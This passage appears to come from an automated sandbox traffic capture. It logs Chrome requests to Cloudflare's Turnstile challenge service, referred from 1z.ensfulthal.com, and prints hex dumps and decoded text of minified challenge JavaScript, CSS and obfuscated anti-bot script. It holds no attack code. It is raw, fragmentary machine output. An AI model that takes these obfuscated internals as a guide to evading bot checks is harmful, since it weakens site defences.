                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                                                          Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                                          Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                                          Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          14192.168.2.1649731104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:10 UTC800OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/ HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                          Sec-Fetch-Site: cross-site
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Dest: iframe
                                                                                          Referer: https://1z.ensfulthal.com/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:10 UTC1362INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 26460
                                                                                          Connection: close
                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                          content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                          cross-origin-embedder-policy: require-corp
                                                                                          cross-origin-opener-policy: same-origin
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          origin-agent-cluster: ?1
                                                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                          critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                          referrer-policy: same-origin
                                                                                          document-policy: js-profiling
                                                                                          2024-11-27 14:15:10 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 65 39 32 62 61 39 34 36 64 64 65 38 63 65 63 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                          Data Ascii: Server: cloudflareCF-RAY: 8e92ba946dde8cec-EWRalt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:10 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                                          Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                          Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                          2024-11-27 14:15:10 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                          2024-11-27 14:15:11 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                          2024-11-27 14:15:11 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          15192.168.2.1649732104.18.94.414435868C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2024-11-27 14:15:12 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e92ba946dde8cec&lang=auto HTTP/1.1
                                                                                          Host: challenges.cloudflare.com
                                                                                          Connection: keep-alive
                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                          sec-ch-ua-mobile: ?0
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                          sec-ch-ua-platform: "Windows"
                                                                                          Accept: */*
                                                                                          Sec-Fetch-Site: same-origin
                                                                                          Sec-Fetch-Mode: no-cors
                                                                                          Sec-Fetch-Dest: script
                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/hzi5z/0x4AAAAAAAz46PioTgf_NUpB/auto/fbE/normal/auto/
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          2024-11-27 14:15:12 UTC331INHTTP/1.1 200 OK
                                                                                          Date: Wed, 27 Nov 2024 14:15:12 GMT
                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                          Content-Length: 118072
                                                                                          Connection: close
                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e92ba9f59cc42c6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          2024-11-27 14:15:12 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 45 73 73 58 42 30 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.EssXB0={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                          2024-11-27 14:15:12 UTC1369INData Raw: 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 53 74 75 63 6b 25 32 30 68 65 72 65 25 33 46 22 2c 22 68 75 6d 61 6e 5f 62 75 74 74 6f 6e 5f 74 65 78 74 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e 6c 79 25 32 43 25 32 30 61 6c 77 61 79 73 25 32 30 70 61 73 73 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 25 32 30 66 65 65 64 62 61 63 6b 25 32 30 72 65 70 6f 72 74 25 32 30 68 61 73 25 32 30 62 65 65 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 6c 79 25 32 30 73 75 62 6d
                                                                                          Data Ascii: urnstile_overrun_description":"Stuck%20here%3F","human_button_text":"Verify%20you%20are%20human","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20subm
                                                                                          2024-11-27 14:15:12 UTC1369INData Raw: 2c 67 35 2c 67 36 2c 67 67 2c 67 72 2c 67 76 2c 67 77 2c 67 44 2c 67 48 2c 65 59 2c 65 5a 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 38 35 36 29 29 2f 31 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 32 34 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 36 38 36 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 37 33 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 38 33 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 33 32 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 30 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67 49
                                                                                          Data Ascii: ,g5,g6,gg,gr,gv,gw,gD,gH,eY,eZ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(856))/1+-parseInt(gI(1824))/2+parseInt(gI(686))/3*(parseInt(gI(1373))/4)+parseInt(gI(1083))/5*(-parseInt(gI(632))/6)+-parseInt(gI(1106))/7*(parseInt(gI
                                                                                          2024-11-27 14:15:12 UTC1369INData Raw: 3b 63 61 73 65 27 33 27 3a 6c 3d 61 48 5b 33 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 62 77 5b 30 5d 3d 62 78 28 62 79 2c 62 7a 5b 30 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 62 44 5b 32 5d 3d 65 5b 67 54 28 31 32 34 36 29 5d 28 62 45 2c 6d 2c 62 46 5b 32 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 62 47 5b 33 5d 3d 65 5b 67 54 28 31 32 34 36 29 5d 28 62 48 2c 6c 2c 62 49 5b 33 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 37 27 3a 6d 3d 61 47 5b 32 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 38 27 3a 61 44 3d 61 45 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 39 27 3a 66 6f 72 28 61 4d 3d 30 3b 65 5b 67 54 28 35 34 36 29 5d 28 36 34 2c 61 4e 29 3b 61 4f 2b 2b 29 7b 69 66 28 6e 3d 62 56
